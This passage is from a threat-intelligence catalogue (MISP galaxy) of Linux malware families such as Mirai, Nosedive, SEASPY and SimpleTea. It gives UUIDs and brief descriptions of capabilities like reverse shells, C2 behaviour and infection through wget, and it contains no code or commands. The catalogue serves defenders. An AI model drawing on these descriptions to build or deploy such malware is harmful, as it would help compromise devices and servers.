UUID aae3b83d-a116-4ebc-aae0-f6327ef174ea which can be used as unique global reference for MiKey in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mirai (ELF)

Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mirai (ELF).

Known Synonyms
`Katana`

Internal MISP references

UUID 17e12216-a303-4a00-8283-d3fe92d0934c which can be used as unique global reference for Mirai (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mokes (ELF)

Internal MISP references

UUID 6d5a5357-4126-4950-b8c3-ee78b1172217 which can be used as unique global reference for Mokes (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Momentum

Internal MISP references

UUID aaf8ce1b-3117-47c6-b756-809538ac8ff2 which can be used as unique global reference for Momentum in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Monti

A ransomware, derived from the leaked Conti source code.

Internal MISP references

UUID 7df77b77-00dd-4eba-a697-b9a7be262acc which can be used as unique global reference for Monti in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MooBot

Internal MISP references

UUID cd8deffe-eb0b-4451-8a13-11f6d291064a which can be used as unique global reference for MooBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Moose

Internal MISP references

UUID 7fdb91ea-52dc-499c-81f9-3dd824e2caa0 which can be used as unique global reference for Moose in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mozi

Mozi is a IoT botnet, that makes use of P2P for communication and reuses source code of other well-known malware families, including Gafgyt, Mirai, and IoT Reaper.

Internal MISP references

UUID 236ba358-4c70-434c-a7ac-7a31e76c398a which can be used as unique global reference for Mozi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MrBlack

MrBlack, first identified in May 2014 by Russian security firm Dr. Web, is a botnet that targets Linux OS and is designed to conduct distributed denial-of-service (DDoS) attacks. In May 2015, Incapsula clients suffered a large-scale DDoS attack which the company attributed to network traffic generated by tens of thousands of small office/home office (SOHO) routers infected with MrBlack. This massive botnet spans over 109 countries, especially in Thailand and Brazil.

MrBlack scans for and infects routers that have not had their default login credentials changed and that allow remote access to HTTP and SSH via port 80 and port 22, respectively. One of the most impacted router brands is Ubiquiti, a U.S.-based firm that provides bulk network hub solutions for internet service providers to lease to their customers. Once a vulnerable router is compromised and MrBlack is injected into the system, a remote server is contacted and system information from the device is transmitted. This allows the host server to receive commands in order to perform different types of DDoS attacks, download and execute files, and terminate processes.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MrBlack.

Known Synonyms
`AESDDoS`
`Dofloo`

Internal MISP references

UUID fc047e32-9cf2-4a92-861a-be882efd8a50 which can be used as unique global reference for MrBlack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mumblehard

Internal MISP references

UUID 5f78127b-25d3-4f86-8a64-f9549b2db752 which can be used as unique global reference for Mumblehard in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nextcry

Ransomware used against Linux servers.

Internal MISP references

UUID 7ec8a41f-c72e-4832-a5a4-9d7380cea083 which can be used as unique global reference for Nextcry in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ngioweb (ELF)

Internal MISP references

UUID a4ad242c-6fd0-4b1d-8d97-8f48150bf242 which can be used as unique global reference for Ngioweb (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nimbo-C2 (ELF)

According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 and Linux. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).

Internal MISP references

UUID 5dbdf2ea-a15b-4ad6-bf7a-a030998c66b4 which can be used as unique global reference for Nimbo-C2 (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NiuB

Golang-based RAT that offers execution of shell commands and download+run capability.

Internal MISP references

UUID 7c516b66-f4a4-406a-bf35-d898ac8bffec which can be used as unique global reference for NiuB in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NoaBot

Internal MISP references

UUID b5ee45a0-d75b-40e7-b737-3cfa1cc8246c which can be used as unique global reference for NoaBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nood RAT

Internal MISP references

UUID 59ac87c0-f2ce-4e83-83bd-299e123b72a7 which can be used as unique global reference for Nood RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nosedive

According to Black Lotus Labs, Nosedive is a custom variation of the Mirai implant that is supported on all major SOHO and IoT architectures (e.g. MIPS, ARM, SuperH, PowerPC, etc.). Nosedive implants are typically deployed from Tier 2 payload servers in the Raptor Train infrastructure through a unique URL encoding scheme and domain injection method. Nosedive droppers use this method to request payloads for specific C2s by encoding the requested C2 domain and joining it with a unique "key" that identifies the bot and the target architecture of the compromised device (e.g. MIPS, ARM, etc.), which is then injected into the Nosedive implant payload that is deployed to the Tier 1 node. Once deployed, Nosedive runs in-memory only and allows the operators to execute commands, upload and download files, and run DDoS attacks on compromised devices.

The malware and its associated droppers are memory-resident only and deleted from disk. This, in addition to anti-forensics techniques employed on these devices including the obfuscation of running process names, compromising devices through a multi-stage infection chain, and killing remote management processes, makes detection and forensics much more difficult.

Internal MISP references

UUID 13840bb0-494d-403e-a37d-65cf144d71e9 which can be used as unique global reference for Nosedive in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NOTROBIN

FireEye states that NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NOTROBIN.

Known Synonyms
`remove_bds`

Internal MISP references

UUID aaeb76b3-3885-4dc6-9501-4504fed9f20b which can be used as unique global reference for NOTROBIN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

OrBit

According to stormshield, Orbit is a two-stage malware that appeared in July 2022, discovered by Intezer lab. Acting as a stealer and backdoor on 64-bit Linux systems, it consists of an executable acting as a dropper and a dynamic library.

Internal MISP references

UUID ae9d84f2-60e5-4a33-98f4-a0061938ec6d which can be used as unique global reference for OrBit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Owari

Mirai variant by actor "Anarchy" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.

Internal MISP references

UUID ec67f206-6464-48cf-a012-3cdfc1278488 which can be used as unique global reference for Owari in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

p0sT5n1F3r

According to Yarix digital security, this is a malware that allows to sniff on HTTPS traffic, implemented as Apache module.

Internal MISP references

UUID cc48c6ae-d274-4ad0-b013-bd75041a20c8 which can be used as unique global reference for p0sT5n1F3r in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

P2Pinfect

P2Pinfect is a fast-growing multi platform botnet, the purpose of which is still unknown. Written in Rust, it is compatible with Windows and Linux, including a MIPS variant for Linux based routers and IoT devices. It is capable of brute forcing SSH logins and exploiting Redis servers in order to propagate itself both to random IPs on the internet and to hosts it can find references to in files present on the infected system.

Internal MISP references

UUID 31a32308-7034-4419-b1f3-56a4d64b4358 which can be used as unique global reference for P2Pinfect in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pbot

P2P botnet derived from the Mirai source code.

Internal MISP references

UUID 7aff049d-9326-466d-bbcc-d62da673b32c which can be used as unique global reference for pbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Penquin Turla

Internal MISP references

UUID 262e0cf2-2fed-4d37-8d7a-0fd62c712840 which can be used as unique global reference for Penquin Turla in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

perfctl

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular perfctl.

Known Synonyms
`perfcc`

Internal MISP references

UUID 5a4408f2-6ee3-4c82-9ee2-a1b4290666be which can be used as unique global reference for perfctl in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PerlBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PerlBot.

Known Synonyms
`DDoS Perl IrcBot`
`ShellBot`

Internal MISP references

UUID 24b77c9b-7e7e-4192-8161-b6727728170f which can be used as unique global reference for PerlBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Persirai

Internal MISP references

UUID 2ee05352-3d4a-448b-825d-9d6c10792bf7 which can be used as unique global reference for Persirai in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PG_MEM

Internal MISP references

UUID 74ffa404-9082-4db9-ac19-18a875db9fe7 which can be used as unique global reference for PG_MEM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PigmyGoat

Internal MISP references

UUID fcdcdc68-4c82-4d3d-aef1-96eac0a62761 which can be used as unique global reference for PigmyGoat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PingPull

Internal MISP references

UUID 65a7944c-15d9-4ca5-8561-7c97b18684c8 which can be used as unique global reference for PingPull in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pink

A botnet with P2P and centralized C&C capabilities.

Internal MISP references

UUID 67063764-a47c-4058-9cb2-1685ffa14fe8 which can be used as unique global reference for Pink in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PLEAD (ELF)

Internal MISP references

UUID de3c14aa-f9f4-4071-8e6e-a2c16a3394ad which can be used as unique global reference for PLEAD (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Poseidon (ELF)

Part of Mythic C2, written in Golang.

Internal MISP references

UUID ad796632-2595-4ae5-a563-b92197210d61 which can be used as unique global reference for Poseidon (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PRISM

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PRISM.

Known Synonyms
`waterdrop`

Internal MISP references

UUID 9a4a866b-84a9-4778-8de8-2780a27c0597 which can be used as unique global reference for PRISM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PrivetSanya

Black Lotus Labs identified malware for the Windows Subsystem for Linux (WSL). Mostly written in Python but compiled as Linux ELF files.

Internal MISP references

UUID 41e5aafb-5847-421e-813d-627414ee31bb which can be used as unique global reference for PrivetSanya in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Prometei (ELF)

Internal MISP references

UUID b6899bda-54e9-4953-8af5-22af39776b69 which can be used as unique global reference for Prometei (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Pro-Ocean

Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.

Internal MISP references

UUID aa918c10-e5c7-4abd-b8c0-3c938a6675f5 which can be used as unique global reference for Pro-Ocean in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pupy (ELF)

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.

Internal MISP references

UUID 92a1288f-cc4d-47ca-8399-25fe5a39cf2d which can be used as unique global reference for pupy (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Qilin

Internal MISP references

UUID d97af6c5-640f-46b4-943c-0e8940f8011e which can be used as unique global reference for Qilin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QNAPCrypt

The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:

The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.
Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.
Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QNAPCrypt.

Known Synonyms
`eCh0raix`

Internal MISP references

UUID a0b12e5f-0257-41f1-beda-001ad944c4ca which can be used as unique global reference for QNAPCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QSnatch

The malware infects QNAP NAS devices, is persisting via various mechanisms and resists cleaning by preventing firmware updates and interfering with QNAP MalwareRemover. The malware steals passwords and hashes

Internal MISP references

UUID 48389957-30e2-4747-b4c6-8b8a9f15250f which can be used as unique global reference for QSnatch in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QUIETEXIT

Mandiant observed this backdoor being observed by UNC3524. It is based on the open-source Dropbear SSH source code.

Internal MISP references

UUID 6a5ab9ca-944c-4187-bdef-308516745d18 which can be used as unique global reference for QUIETEXIT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

r2r2

Internal MISP references

UUID 759f8590-a049-4c14-be8a-e6605e2cd43d which can be used as unique global reference for r2r2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RagnarLocker (ELF)

Internal MISP references

UUID 5f96787e-fc9f-486b-a15f-f46c8179a4d5 which can be used as unique global reference for RagnarLocker (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rakos

Internal MISP references

UUID 4592384c-48a7-4e16-b492-7add50a7d2f5 which can be used as unique global reference for Rakos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RansomEXX (ELF)

According to SentineOne, RansomEXX (aka Defray, Defray777), a multi-pronged extortion threat, has been observed in the wild since late 2020. RansomEXX is associated with attacks against the Texas Department of Transportation, Groupe Atlantic, and several other large enterprises. There are Windows and Linux variants of this malware family, and they are known for their limited and exclusive targeting.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RansomEXX (ELF).

Known Synonyms
`Defray777`

Internal MISP references

UUID 946814a1-957c-48ce-9068-fdef24a025bf which can be used as unique global reference for RansomEXX (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RansomExx2

According to IBM Security X-Force, this is a new but functionally very similar version of RansomExx, fully rewritten in Rust and internally referred to as RansomExx2.

Internal MISP references

UUID c6d750d5-fa47-4fcb-9d24-2682036fc6e5 which can be used as unique global reference for RansomExx2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RapperBot

A Mirai derivate bruteforcing SSH servers.

Internal MISP references

UUID 914c94eb-38e2-4cb8-a62b-21fbe9c48496 which can be used as unique global reference for RapperBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RaspberryPiBotnet

Internal MISP references

UUID 8dee025b-2233-4cd8-af02-fcdcd40b378f which can be used as unique global reference for RaspberryPiBotnet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

rat_hodin

Internal MISP references

UUID 6aacf515-de49-4afc-a135-727c9beaab0b which can be used as unique global reference for rat_hodin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

rbs_srv

Internal MISP references

UUID a08d9f8b-2cc5-48c2-8cce-ee713bcdc4b7 which can be used as unique global reference for rbs_srv in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedTail

RedTail is a cryptomining malware, which is based on the open-source XMRIG mining software. It is being spread via known vulnerabilities such as: - CVE-2024-3400 - CVE-2023-46805 - CVE-2024-21887 - CVE-2023-1389 - CVE-2022-22954 - CVE-2018-20062

Internal MISP references

UUID ba89a509-ff8e-446b-867c-7f15efe0477f which can be used as unique global reference for RedTail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedXOR

RedXOR is a sophisticated backdoor targeting Linux systems disguised as polkit daemon and utilizing network data encoding based on XOR. Believed to be developed by Chinese nation-state actors, this malware shows similarities to other malware associated with the Winnti umbrella threat group.

RedXOR uses various techniques such as open-source LKM rootkits, Python pty shell, and network data encoding with XOR. It also employs persistence methods and communication with a Command and Control server over HTTP.

The malware can execute various commands including system information collection, updates, shell commands, and network tunneling.

Internal MISP references

UUID 421b2ec7-d4e6-4fc8-9bd3-55fe26337aae which can be used as unique global reference for RedXOR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RedAlert Ransomware

Ransomware that targets Linux VMware ESXi servers. Encryption procedure uses the NTRUEncrypt public-key encryption algorithm.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedAlert Ransomware.

Known Synonyms
`N13V`

Internal MISP references

UUID 12137c8d-d3f4-44fe-b25e-2fb5f90cecce which can be used as unique global reference for RedAlert Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rekoobe

A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm

Internal MISP references

UUID 48b9a9fd-4c1a-428a-acc0-40b1a3fa7590 which can be used as unique global reference for Rekoobe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

reptile

Internal MISP references

UUID 934478a1-1243-4c26-8360-be3d01ae193e which can be used as unique global reference for reptile in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

REvil (ELF)

ELF version of win.revil targeting VMware ESXi hypervisors.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REvil (ELF).

Known Synonyms
`REvix`

Internal MISP references

UUID d9d76456-01a3-4dcd-afc2-87529e00c1ba which can be used as unique global reference for REvil (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rex

Internal MISP references

UUID 49639ff5-e0be-4b6a-850b-d5d8dd37e62b which can be used as unique global reference for Rex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RHOMBUS

Internal MISP references

UUID af886910-9a0b-478e-b53d-54c8a103acb4 which can be used as unique global reference for RHOMBUS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rhysida (ELF)

Internal MISP references

UUID 1dbd7cbb-960d-4ef4-9520-1748fb7cd4c6 which can be used as unique global reference for Rhysida (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Roboto

P2P Botnet discovered by Netlab360. The botnet infects linux servers via the Webmin RCE vulnerability (CVE-2019-15107) which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlabs360 analysis, the botnet serves mainly 7 functions: reverse shell, self-uninstall, gather process' network information, gather Bot information, execute system commands, run encrypted files specified in URLs and four DDoS attack methods: ICMP Flood, HTTP Flood, TCP Flood, and UDP Flood.

Internal MISP references

UUID e18bf514-b978-4bef-b4d9-834a5100fced which can be used as unique global reference for Roboto in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RotaJakiro

RotaJakiro is a stealthy Linux backdoor which remained undetected between 2018 and 2021. The malware uses rotating encryption to encrypt the resource information within the sample, and C2 communication, using a combination of AES, XOR, ROTATE encryption and ZLIB compression.

Internal MISP references

UUID 66fb7b48-60f2-44fc-9cbe-f70e776d058b which can be used as unique global reference for RotaJakiro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Royal Ransom (ELF)

According to Trendmicro, Royal ransomware was first observed in September 2022, and the threat actors behind it are believed to be seasoned cybercriminals who used to be part of Conti Team One.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Royal Ransom (ELF).

Known Synonyms
`Royal`
`Royal_unix`

Internal MISP references

UUID 4e29dae1-5a8c-4b3c-81dc-dcc0fdd3c93a which can be used as unique global reference for Royal Ransom (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rshell

Internal MISP references

UUID 4947e9d3-aa13-4359-ac43-c1c436c409c9 which can be used as unique global reference for Rshell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RudeDevil

Internal MISP references

UUID 923ee959-4ea5-46c5-8926-84e41ca77ca4 which can be used as unique global reference for RudeDevil in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SALTWATER

According to Mandiant, SALTWATER is a module for the Barracuda SMTP daemon (bsmtpd) that has backdoor functionality. SALTWATER can upload or download arbitrary files, execute commands, and has proxy and tunneling capabilities. The backdoor is implemented using hooks on the send, recv, close syscalls via the 3rd party kubo/funchook hooking library, and amounts to five components, most of which are referred to as "Channels" within the binary. In addition to providing backdoor and proxying capabilities, these components exhibit classic backdoor functionality.

Internal MISP references

UUID d55ea436-b2c1-400c-99dc-6e35bc05438b which can be used as unique global reference for SALTWATER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Satori

Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).

Internal MISP references

UUID 9e5d83a8-1181-43fe-a77f-28c8c75ffbd0 which can be used as unique global reference for Satori in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SBIDIOT

Internal MISP references

UUID b4c20cf4-8e94-4523-8d48-7781aab6785d which can be used as unique global reference for SBIDIOT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SEASPY

According to CISA, this malware is a persistent backdoor that masquerades as a legitimate Barracuda Networks service. The malware is designed to listen to commands received from the Threat Actor’s Command-and-Control through TCP packets. When executed, the malware uses libpcap sniffer to monitor traffic for a magic packet on TCP port 25 (SMTP) and TCP port 587. It checks the network packet captured for a hard-coded string. When the right sequence of packet is captured, it establishes a TCP reverse shell to the C2 server for further exploitation. This allows the TA to execute arbitrary commands on the compromised system. The malware is based on an open-source backdoor program named "cd00r".

Internal MISP references

UUID a6699c42-69d8-4bdd-8dd9-72f4c80efefa which can be used as unique global reference for SEASPY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

sedexp

Internal MISP references

UUID 4e71e8ab-a34a-494f-814d-cc983a2de463 which can be used as unique global reference for sedexp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ShellBind

Internal MISP references

UUID b51caf06-736e-46fc-9b13-48b0b81df4b7 which can be used as unique global reference for ShellBind in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shishiga

Internal MISP references

UUID 51da734c-70dd-4337-ab08-ab61457e0da5 which can be used as unique global reference for Shishiga in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SideWalk (ELF)

Internal MISP references

UUID ec994efc-a8a4-4e92-ada2-e37d421baf01 which can be used as unique global reference for SideWalk (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Silex

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silex.

Known Synonyms
`silexbot`

Internal MISP references

UUID bf059cb4-f73a-4181-bf71-d8da7bf50dd8 which can be used as unique global reference for Silex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SimpleTea (ELF)

SimpleTea for Linux is an HTTP(S) RAT.

It was discovered in Q1 2023 as an instance of the Lazarus group's Operation DreamJob campaign for Linux. It was a payload downloaded in an execution chain which started with an HSBC-themed job offer lure. It shared the same C&C server as payloads from the 3CX incident around the same time.

It’s an object-oriented project, which does not run on Linux distributions without a graphical user interface, and decrypts its configuration from /home/%user%/.config/apdl.cf using 0x7E as the XOR key. It uses AES-GCM for encryption and decryption of its network traffic.

It supports basic commands that include operations on the victim’s filesystem, manipulation with its configuration, file exfiltration (via ZIP archives), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 16-bit integers, starting with the value 0x27C3.

SimpleTea for Linux seems like an updated version of BadCall for Linux, rewritten from C to C++, as there are similarities in class names and function names between the two.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SimpleTea (ELF).

Known Synonyms
`PondRAT`
`SimplexTea`

Internal MISP references

UUID e8695701-8055-4b98-bcb6-e4bb7e0a3346 which can be used as unique global reference for SimpleTea (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SLAPSTICK

According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.

Internal MISP references

UUID fb3e0a1d-3a98-4cbd-ad7f-4bbb4b9a8351 which can be used as unique global reference for SLAPSTICK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SnappyTCP

According to PwC, SnappyTCP is a simple reverse shell for Linux/Unix systems, with variants for plaintext and TLS communication. SeaTurtle has used SnappyTCP at least between 2021 and 2023.

Internal MISP references

UUID 72e045be-eba2-4571-9c6e-7d35add3d2f8 which can be used as unique global reference for SnappyTCP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SoWaT

This is an implant used by APT31 on home routers to utilize them as ORBs.

Internal MISP references

UUID c2866996-d622-4ee2-b548-a6598836e5ae which can be used as unique global reference for SoWaT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Spamtorte

Internal MISP references

UUID 7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0 which can be used as unique global reference for Spamtorte in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpeakUp

Internal MISP references

UUID 3ccd3143-c34d-4680-94b9-2cc4fa4f86fa which can be used as unique global reference for SpeakUp in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Specter

Internal MISP references

UUID b9ed5797-b591-4ca9-ba77-ce86308e333a which can be used as unique global reference for Specter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpectralBlur (ELF)

Internal MISP references

UUID a14e7ea4-668c-4990-a1a9-be99722f88f7 which can be used as unique global reference for SpectralBlur (ELF) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Speculoos

Internal MISP references

UUID df23ae3a-e10d-4c49-b379-2ea2fd1925af which can be used as unique global reference for Speculoos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SprySOCKS

Internal MISP references

UUID 3b5c485b-b6a6-4586-a7dc-9e23a3b0aa5a which can be used as unique global reference for SprySOCKS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SSHDoor

Internal MISP references

UUID 275d65b9-0894-4c9b-a255-83daddb2589c which can be used as unique global reference for SSHDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stantinko

Internal MISP references

UUID e8c131df-ee3b-41d4-992d-71d3090d2d98 which can be used as unique global reference for Stantinko in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

STEELCORGI

According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.

Internal MISP references

UUID 21ff33b5-ef21-4263-8747-7de3d2dbdde6 which can be used as unique global reference for STEELCORGI in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sunless

Internal MISP references

UUID d03fa69b-53a4-4f61-b800-87e4246d2656 which can be used as unique global reference for Sunless in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

sustes miner

Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software.

Internal MISP references

UUID 5c117b01-826b-4656-b6ca-8b18b6e6159f which can be used as unique global reference for sustes miner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Suterusu

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Suterusu.

Known Synonyms
`HCRootkit`

Internal MISP references

UUID d2748a0c-8739-4006-95c4-bdf6350d7fa9 which can be used as unique global reference for Suterusu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sword2033

Internal MISP references

UUID 9c1a32c7-45b4-4d3a-9d15-300b353f32a7 which can be used as unique global reference for Sword2033 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Symbiote

